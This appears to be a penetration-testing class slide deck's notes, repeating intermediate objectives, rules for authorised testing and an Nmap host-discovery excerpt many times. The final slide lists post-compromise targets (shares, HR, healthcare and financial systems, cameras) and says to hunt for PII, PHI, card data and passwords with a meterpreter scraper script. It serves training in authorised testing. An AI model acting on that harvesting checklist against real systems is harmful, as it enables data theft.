  3. Intermediate Objectives:Windows adminDomain admin Linux rootNetwork admin
  4. Have fun, but…Hack Responsibly!Written permissionStay in scope: Applications, servers, networks, testing locations, and testing windowsDon’t change major states: services, accounts, server restarts, firewall rulesRestore state: Leave it how you found itClear communicationIssuesResultsClass rules
  5. Intermediate Objectives:Windows adminDomain admin Linux rootNetwork admin
  6. Intermediate Objectives:Windows adminDomain admin Linux rootNetwork admin
  7. Intermediate Objectives:Windows adminDomain admin Linux rootNetwork admin
  8. Intermediate Objectives:Windows adminDomain admin Linux rootNetwork admin
  9. Have fun, but…Hack Responsibly!Written permissionStay in scope: Applications, servers, networks, testing locations, and testing windowsDon’t change major states: services, accounts, server restarts, firewall rulesRestore state: Leave it how you found itClear communicationIssuesResults
  10. Intermediate Objectives:Windows adminDomain admin Linux rootNetwork admin
  11. Intermediate Objectives:Windows adminDomain admin Linux rootNetwork admin
  12. Have fun, but…Hack Responsibly!Written permissionStay in scope: Applications, servers, networks, testing locations, and testing windowsDon’t change major states: services, accounts, server restarts, firewall rulesRestore state: Leave it how you found itClear communicationIssuesResults
  13. Have fun, but…Hack Responsibly!Written permissionStay in scope: Applications, servers, networks, testing locations, and testing windowsDon’t change major states: services, accounts, server restarts, firewall rulesRestore state: Leave it how you found itClear communicationIssuesResults
  14. Intermediate Objectives:Windows adminDomain admin Linux rootNetwork admin
  15. Have fun, but…Hack Responsibly!Written permissionStay in scope: Applications, servers, networks, testing locations, and testing windowsDon’t change major states: services, accounts, server restarts, firewall rulesRestore state: Leave it how you found itClear communicationIssuesResults
  16. Have fun, but…Hack Responsibly!Written permissionStay in scope: Applications, servers, networks, testing locations, and testing windowsDon’t change major states: services, accounts, server restarts, firewall rulesRestore state: Leave it how you found itClear communicationIssuesResults
  17. Have fun, but…Hack Responsibly!Written permissionStay in scope: Applications, servers, networks, testing locations, and testing windowsDon’t change major states: services, accounts, server restarts, firewall rulesRestore state: Leave it how you found itClear communicationIssuesResults
  18. Have fun, but…Hack Responsibly!Written permissionStay in scope: Applications, servers, networks, testing locations, and testing windowsDon’t change major states: services, accounts, server restarts, firewall rulesRestore state: Leave it how you found itClear communicationIssuesResults
  19. Have fun, but…Hack Responsibly!Written permissionStay in scope: Applications, servers, networks, testing locations, and testing windowsDon’t change major states: services, accounts, server restarts, firewall rulesRestore state: Leave it how you found itClear communicationIssuesResults
  20. Mention Pro Tools (Nessus, Nexpose, Etc.) -Explain why we aren’t going over them today.
  21. Direct = include tcp udp
  22. If no host discovery options are given, Nmap sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. (For IPv6, the ICMP timestamp request is omitted because it is not part of ICMPv6.) These defaults are equivalent to the -PE -PS443 -PA80 -PP options. The exceptions to this are the ARP (for IPv4) and Neighbor Discovery (for IPv6) scans which are used for any targets on a local ethernet network. For unprivileged Unix shell users, the default probes are a SYN packet to ports 80 and 443 using the connect system call. This host discovery is often sufficient when scanning local networks, but a more comprehensive set of discovery probes is recommended for security auditing.
  23. If no host discovery options are given, Nmap sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. (For IPv6, the ICMP timestamp request is omitted because it is not part of ICMPv6.) These defaults are equivalent to the -PE -PS443 -PA80 -PP options. The exceptions to this are the ARP (for IPv4) and Neighbor Discovery (for IPv6) scans which are used for any targets on a local ethernet network. For unprivileged Unix shell users, the default probes are a SYN packet to ports 80 and 443 using the connect system call. This host discovery is often sufficient when scanning local networks, but a more comprehensive set of discovery probes is recommended for security auditing.
  24. targets-ipv6-multicast-echo – multi castDefault disco use -sn ; pinIf no host discovery options are given, Nmap sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. (For IPv6, the ICMP timestamp request is omitted because it is not part of ICMPv6.) These defaults are equivalent to the -PE -PS443 -PA80 -PP options. The exceptions to this are the ARP (for IPv4) and Neighbor Discovery (for IPv6) scans which are used for any targets on a local ethernet network. For unprivileged Unix shell users, the default probes are a SYN packet to ports 80 and 443 using the connect system call. This host discovery is often sufficient when scanning local networks, but a more comprehensive set of discovery probes is recommended for security auditing.Even if different ping types (such as -PE or -PS) are specified, Nmap uses ARP instead for any of the targets which are on the same LAN. If you absolutely don't want to do an ARP scan, specify --disable-arp-ping
  25. If no host discovery options are given, Nmap sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. (For IPv6, the ICMP timestamp request is omitted because it is not part of ICMPv6.) These defaults are equivalent to the -PE -PS443 -PA80 -PP options. The exceptions to this are the ARP (for IPv4) and Neighbor Discovery (for IPv6) scans which are used for any targets on a local ethernet network. For unprivileged Unix shell users, the default probes are a SYN packet to ports 80 and 443 using the connect system call. This host discovery is often sufficient when scanning local networks, but a more comprehensive set of discovery probes is recommended for security auditing.
  26. If no host discovery options are given, Nmap sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. (For IPv6, the ICMP timestamp request is omitted because it is not part of ICMPv6.) These defaults are equivalent to the -PE -PS443 -PA80 -PP options. The exceptions to this are the ARP (for IPv4) and Neighbor Discovery (for IPv6) scans which are used for any targets on a local ethernet network. For unprivileged Unix shell users, the default probes are a SYN packet to ports 80 and 443 using the connect system call. This host discovery is often sufficient when scanning local networks, but a more comprehensive set of discovery probes is recommended for security auditing.
  27. If no host discovery options are given, Nmap sends an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. (For IPv6, the ICMP timestamp request is omitted because it is not part of ICMPv6.) These defaults are equivalent to the -PE -PS443 -PA80 -PP options. The exceptions to this are the ARP (for IPv4) and Neighbor Discovery (for IPv6) scans which are used for any targets on a local ethernet network. For unprivileged Unix shell users, the default probes are a SYN packet to ports 80 and 443 using the connect system call. This host discovery is often sufficient when scanning local networks, but a more comprehensive set of discovery probes is recommended for security auditing.
  28. Encoding note
  29. local drivesnetwork sharesSharepointFTP/SFTPDatabases Mail Server - Sendmail, PostfixCritical Client ApplicationsHR ApplicationsHealthcare ApplicationsFinancial ApplicationsCode RepositoriesPhysical BadgingPhysical Access ControlCamera SystemsFind - PIIFind - PHI Find - CHDFind - PasswordsRun meterpreter scraper script